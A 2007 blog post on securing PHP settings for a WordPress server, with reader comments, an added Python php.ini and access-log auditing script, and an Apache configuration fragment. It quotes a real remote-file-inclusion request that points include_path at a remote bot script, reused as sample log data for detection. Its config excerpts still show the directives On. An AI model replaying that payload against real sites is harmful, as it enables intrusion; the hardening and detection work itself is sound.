how to secure wordpress server : PHP secure configuration (part I)
Last night, I read a chapter on PHP security from apachesecurity.net. Therein, I found some practical points that can be used to secure PHP’s configuration and its interaction with Apache. Assume we already turned on safe_mode for PHP, per my article on how to secure wordpress server and other LAMP application servers.
For a Wordpress 2.1 server running on an up-to-date FC6/i386 (Fedora Core Linux 6) server, the following PHP secure configuration can be applied to /etc/php.ini. By the time you read this post, this wordpress blog server has been running with these secure settings applied.
Below, we’ll examine these three secure options one by one. In /etc/php.ini from a stock installation of PHP,
- allow_url_fopen is on by default.
This is dangerous, since it allows PHP to treat URLs as files. An attack that taints a file-name parameter normally requires the file to be local to the web server; getting a malicious file onto the web server for execution takes a separate, and probably more difficult, attack. With this directive on, however, your PHP script will open URLs as if they were files, which opens the floodgate for potential attackers. So, turn it off. Here is the excerpt from /etc/php.ini.
;Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; allow_url_fopen = On
Below is an attack attempt against this server, as observed in Apache’s access_log (the attacker’s IP address was replaced).
8.8.8.8 - - [03/Feb/2007:17:47:20 -0500] "GET /lib/activeutil.php?set[include_path]=http://w32-gen.us/bot.php? HTTP/1.1" 404 1244575 160 12240 "-" "null was here."
- enable_dl is on by default
PHP can load modules dynamically while running, although Apache can’t. If this is disabled, we have to explicitly list the extension modules PHP needs for this site to function. The few modules available are under /usr/lib/php/modules. For a wordpress blog server to function, we need only mysql.so, which was compiled in already (per ‘php -m | grep -i mysql’). Therefore, we can turn this off.
; Whether or not to enable the dl() function. The dl() function does NOT work properly in multithreaded servers, such as IIS or Zeus, and is automatically disabled on them
enable_dl = On
- eliminate the X-powered-by-PHP header.
In my article, “Part I: how to secure wordpress server and other LAMPs“, we changed the Apache directive ‘ServerTokens’ so that the “Server” header says ‘Apache’ only, without leaking information on the OS, Apache version, and Apache modules. PHP adds its own X-Powered-By header, which is controlled by expose_php, and by default it is on.
; Misc
;
;Decides whether PHP may expose the fact that it is installed on the server (e.g. by adding its signature to the Web server header). It is no security threat in any way, but it makes it possible to determine whether you use PHP on your server or not.
expose_php = On
- Important note: if you want to hide this kind of information for security purposes, be aware of a few things:
- Obscurity alone is never good security. The identity of your server can be determined through other fingerprints, such as TCP/IP communication style, the presence or absence of certain files or directories, etc.
- At times, security-by-obscurity can slow down or even deflect certain attacks, especially automated attacks that target specific versions of your server components.
- For every page your server serves, some wordpress themes generate a ‘generator’ META tag that tells the world the exact version of the running wordpress server. So, you may want to take a look at your theme’s header.php as well. For this site, I have the following line:
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" />
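The two checks a server administrator would want after reading the three options above are (a) whether the php.ini actually in effect has allow_url_fopen, enable_dl and expose_php turned off, and (b) whether access_log shows requests like the one quoted earlier, where a query parameter carries a remote URL. The script below is an added example, not code from the post. It assumes the stock defaults the post states (all three directives are On when the line is absent) and treats a commented-out line such as `; allow_url_fopen = On` as not setting anything, so the default still applies; the php.ini text and log lines are constructed samples (the second log line is the post's own quoted attempt with ASCII quotes).

```python
"""Audit php.ini for the three directives and scan access_log for query
parameters whose value is a remote URL (added example, not the post's code)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Directives the post turns off, with the stock default that applies when
# the line is missing or commented out (a '; name = Off' line does nothing).
DIRECTIVES = {
    "allow_url_fopen": "On",
    "enable_dl": "On",
    "expose_php": "On",
}

# Values PHP's ini parser treats as boolean false.
OFF_VALUES = {"off", "0", "false", "no", "none", ""}


def parse_php_ini(text):
    """Return {directive: value} for active (uncommented) lines only."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # drop ';' comments
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def audit_php_ini(text):
    """Return {directive: (effective_value, is_off)} using the defaults above."""
    settings = parse_php_ini(text)
    report = {}
    for name, default in DIRECTIVES.items():
        effective = settings.get(name, default)
        report[name] = (effective, effective.lower() in OFF_VALUES)
    return report


# Combined-log request line: "METHOD target HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def find_remote_url_params(log_lines):
    """Return [(target, param, url)] for each query parameter whose value is
    a remote URL, which is the shape of the include_path attempt in the post."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append((target, name, value))
    return hits


# Constructed sample: the first directive is commented out, so it is still On.
SAMPLE_INI = """\
[PHP]
; allow_url_fopen = On
enable_dl = On
expose_php = Off
"""

# Constructed sample with all three directives set as the post recommends.
HARDENED_INI = """\
allow_url_fopen = Off
enable_dl = Off
expose_php = Off
"""

# Constructed log lines; the second is the attempt quoted in the post.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Feb/2007:17:40:01 -0500] "GET /index.php?p=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '8.8.8.8 - - [03/Feb/2007:17:47:20 -0500] "GET /lib/activeutil.php?set[include_path]=http://w32-gen.us/bot.php? HTTP/1.1" 404 1244575 160 12240 "-" "null was here."',
    '10.0.0.6 - - [03/Feb/2007:18:02:11 -0500] "POST /wp-comments-post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for name, (value, ok) in audit_php_ini(SAMPLE_INI).items():
        print(f"{name:16} = {value:4} {'ok' if ok else 'STILL ON'}")
    for target, param, url in find_remote_url_params(SAMPLE_LOG):
        print(f"remote URL in parameter {param!r}: {url}  ({target})")
```

Run against the real file with `audit_php_ini(open("/etc/php.ini").read())`; note that it reads only that file, so a setting overridden by an Apache php_admin_flag line or a second ini file is not reflected, and `php -i` remains the authoritative view of what is in effect.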
PHP Security said,
February 2, 2007 @ 12:34 pm
I’m not sure why I do not see this at all, but you should also use a not(!) loadmodule line for the php_module, under httpd.conf, to make sure that if the PHP module was not loaded [by an oversight or mistake], all php regex match files are ‘deny from all’.
experts8 said,
February 2, 2007 @ 12:52 pm
The default on FC6 is to run PHP via mod_php instead of CGI. On this server, the CGI module is disabled in httpd.conf, following my own advice on how to secure wordpress server and other LAMP application servers. Therefore, I don’t think you can comment out ‘load php5_module’ in php.conf and still have a functional wordpress blog server on FC6.
Since PHP is what Apache serves for wordpress blog servers, you can’t deny access to them without shutting down certain parts of your site. For instance, when I submit this comment, it is a ‘POST /wp-comments-post.php’ request to the Apache server.
Or, can you elaborate on what you intend to do?
PHP Security said,
February 2, 2007 @ 7:24 pm
[I hope the comment filters do not eat any of code]
From my httpd.conf…
Note that the ‘IfModule’ directive checks to see if a specific module has been loaded, or compiled in, and this code should be placed at the end of your configuration.
# Security check — if no php module is loaded, Apache should return ‘permissions denied’ on all php(4,5) URL requests
<IfModule !php5_module>
<IfModule !php4_module>
<Location />
<FilesMatch "\.php[45]?$">
Order allow,deny
Deny from all
</FilesMatch>
</Location>
</IfModule>
</IfModule>
This has nothing to do with cgi-php. If your server is using the php module, and for whatever reason it’s not loaded, the client will see the source.
experts8 said,
February 2, 2007 @ 8:06 pm
thanks for the clarification. Yeah, good point. I meant to cover hiding source files in general, cgi/php/python/perl, in a post on Apache’s secure configuration. Arguably it could belong to this post on PHP secure configuration as well. What do you think?
PHP Security said,
February 2, 2007 @ 11:32 pm
Sure, why not…
You can even set/override most of the php.ini configuration settings, under httpd.conf, with httpd directive ‘php_value’…
http://www.php.net/manual/en/configuration.changes.php
Just put it all under an .htaccess file, and you’re almost done. Next step, mod_security…
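For the three directives from the post, the httpd.conf route works but the .htaccess route does not: allow_url_fopen, enable_dl and expose_php are all PHP_INI_SYSTEM settings, so they can be changed only in php.ini or with php_admin_flag in the main server configuration, not with php_flag in an .htaccess file, and a script cannot re-enable them with ini_set(). The fragment below is an added example, not configuration from the thread; it assumes mod_php is loaded under the name php5_module, as in the comment above.

```apache
# Added example: force the three directives off from httpd.conf.
# php_admin_flag cannot be overridden by .htaccess or ini_set().
<IfModule php5_module>
    php_admin_flag allow_url_fopen Off
    php_admin_flag enable_dl Off
    php_admin_flag expose_php Off
</IfModule>
```

After restarting Apache, confirm the effective values with `php -i` (for the CLI) or a phpinfo() page served through Apache, since the two can differ.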
experts8 said,
February 20, 2007 @ 12:08 am
PHP-security,
Per your advice, I added a section on how to prevent source code serving in the absence of PHP module, in part II of this PHP secure configuration article